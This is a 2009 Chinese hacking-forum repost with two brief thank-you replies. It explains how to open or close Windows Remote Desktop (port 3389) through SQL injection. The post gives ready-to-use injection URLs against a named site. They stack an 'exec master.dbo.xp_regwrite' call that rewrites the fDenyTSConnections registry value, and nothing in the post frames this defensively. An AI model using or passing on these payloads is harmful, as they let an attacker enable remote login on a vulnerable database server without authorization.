【3.A.S.T】网络安全爱好者 - Powered by Discuz! Board

标题: [转载] 利用SQL语句轻松开启3389 [打印本页]

作者: dsa3027235 时间: 2009-5-24 19:19 标题: 利用SQL语句轻松开启3389

3389登陆关键注册表位置：HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\DenyTSConnections
其中键值DenyTSConnections 直接控制着3389的开启和关闭。当该键值为0表示3389开启，1则表示关闭。而MSSQL的xp_regwrite的存储过程可以对注册进行修改。我们使用这点就可以简单的修改DenyTSConnections键值，从而控制3389的关闭和开启。

开启3389的SQL语句：
syue.com/xiaohua.asp?id=100;exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0;--

关闭3389的SQL语句：
syue.com/xiaohua.asp?id=100;exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',1;

作者: EndTo偌枫 时间: 2009-5-29 08:34

学习了谢谢LZ 辛苦了

作者: ohsky000 时间: 2010-2-15 00:08

不错不错~~~

欢迎光临【3.A.S.T】网络安全爱好者 (http://3ast.com/)